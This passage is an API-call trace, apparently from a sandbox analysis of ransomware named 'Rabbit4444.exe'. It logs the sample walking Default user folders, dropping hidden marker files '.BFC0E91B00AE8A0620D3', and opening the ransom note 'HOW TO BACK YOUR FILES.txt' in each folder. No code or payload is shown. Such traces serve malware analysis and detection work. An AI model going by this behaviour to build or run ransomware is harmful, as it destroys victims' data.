hFindFile=0x102850) returned 1 [0060.536] lstrcpyW (in: lpString1=0x11ceb82, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.536] CreateFileW (lpFileName="C:\\Users\\Default\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0060.537] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0060.537] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x80000 [0060.538] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0060.538] CloseHandle (hObject=0x260) returned 1 [0060.538] CloseHandle (hObject=0x298) returned 1 [0060.538] GetCurrentThreadId () returned 0xcc8 [0060.538] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122308 [0060.538] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Videos", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0060.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf74f8 | out: hHeap=0xe0000) returned 1 [0060.539] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0060.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Videos" | out: lpString1="C:\\Users\\Default\\Videos") returned="C:\\Users\\Default\\Videos" [0060.539] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0060.539] lstrcatW (in: lpString1="C:\\Users\\Default\\Videos\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Videos\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Videos\\.BFC0E91B00AE8A0620D3" [0060.539] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\videos\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0060.539] WriteFile (in: hFile=0x298, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.542] FlushFileBuffers (hFile=0x298) returned 1 [0060.543] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Videos\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.543] CloseHandle (hObject=0x298) returned 1 [0060.544] lstrlenW (lpString="C:\\Users\\Default\\Videos") returned 23 [0060.544] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.544] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Videos\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0060.544] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.544] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.544] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.544] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.544] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbc16a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.544] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.544] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.544] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.544] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.544] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.544] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed687f8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed687f8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.544] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.544] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.544] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed687f8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed687f8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.544] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0060.544] lstrcpyW (in: lpString1=0x11ceb90, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.544] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\videos\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0060.545] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0060.545] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x80000 [0060.545] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0060.545] CloseHandle (hObject=0x260) returned 1 [0060.545] CloseHandle (hObject=0x298) returned 1 [0060.545] GetCurrentThreadId () returned 0xcc8 [0060.545] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122228 [0060.545] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Saved Games", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0060.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115090 | out: hHeap=0xe0000) returned 1 [0060.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122220 | out: hHeap=0xe0000) returned 1 [0060.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Saved Games" | out: lpString1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0060.546] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0060.546] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Saved Games\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Saved Games\\.BFC0E91B00AE8A0620D3" [0060.546] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\saved games\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0060.547] WriteFile (in: hFile=0x298, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.550] FlushFileBuffers (hFile=0x298) returned 1 [0060.551] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Saved Games\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.551] CloseHandle (hObject=0x298) returned 1 [0060.552] lstrlenW (lpString="C:\\Users\\Default\\Saved Games") returned 28 [0060.552] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.552] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0060.552] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.552] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.552] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.552] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.553] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed687f8a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.553] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.553] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.553] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.553] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.553] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.553] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed687f8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed687f8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.553] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.553] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.553] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed687f8a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed687f8a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.553] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0060.553] lstrcpyW (in: lpString1=0x11ceb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.553] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\saved games\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0060.554] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0060.554] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x80000 [0060.554] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0060.554] CloseHandle (hObject=0x260) returned 1 [0060.554] CloseHandle (hObject=0x298) returned 1 [0060.554] GetCurrentThreadId () returned 0xcc8 [0060.554] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122208 [0060.554] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Pictures", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0060.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102750 | out: hHeap=0xe0000) returned 1 [0060.554] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122200 | out: hHeap=0xe0000) returned 1 [0060.554] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0060.555] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0060.555] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Pictures\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Pictures\\.BFC0E91B00AE8A0620D3" [0060.555] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\pictures\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0060.556] WriteFile (in: hFile=0x298, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.558] FlushFileBuffers (hFile=0x298) returned 1 [0060.559] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Pictures\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.559] CloseHandle (hObject=0x298) returned 1 [0060.560] lstrlenW (lpString="C:\\Users\\Default\\Pictures") returned 25 [0060.560] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.560] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0060.560] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.560] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.560] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.560] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.560] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.560] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.560] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.560] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6ae1ac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6ae1ac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.560] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.560] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6ae1ac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6ae1ac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.560] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0060.561] lstrcpyW (in: lpString1=0x11ceb94, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.561] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\pictures\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0060.561] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0060.561] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0060.561] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0060.561] CloseHandle (hObject=0x260) returned 1 [0060.561] CloseHandle (hObject=0x298) returned 1 [0060.561] GetCurrentThreadId () returned 0xcc8 [0060.561] RtlInterlockedPopEntrySList (in: ListHead=0x122128 | out: ListHead=0x122128) returned 0x122268 [0060.562] lstrcpynW (in: lpString1=0x11ceb60, lpString2="C:\\Users\\Default\\Music", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0060.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf7530 | out: hHeap=0xe0000) returned 1 [0060.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0060.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0060.562] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0060.562] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\Music\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\Music\\.BFC0E91B00AE8A0620D3" [0060.562] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\music\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0060.566] WriteFile (in: hFile=0x29c, lpBuffer=0x11cdb68*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb20, lpOverlapped=0x0 | out: lpBuffer=0x11cdb68*, lpNumberOfBytesWritten=0x11ccb20*=0x3d4, lpOverlapped=0x0) returned 1 [0060.568] FlushFileBuffers (hFile=0x29c) returned 1 [0060.569] SetFileAttributesW (lpFileName="C:\\Users\\Default\\Music\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0060.569] CloseHandle (hObject=0x29c) returned 1 [0060.570] lstrlenW (lpString="C:\\Users\\Default\\Music") returned 22 [0060.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.570] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0060.570] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.570] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.570] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0060.570] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.570] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xed6ae1ac, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.570] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.570] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0060.570] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0060.570] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.570] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.571] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6ae1ac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6ae1ac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0060.571] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0060.571] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0060.571] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x11ce010 | out: lpFindFileData=0x11ce010*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xed6ae1ac, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xed6ae1ac, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xed6d43c5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0060.571] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0060.571] lstrcpyW (in: lpString1=0x11ceb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0060.571] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\music\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x29c [0060.572] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0060.572] MapViewOfFile 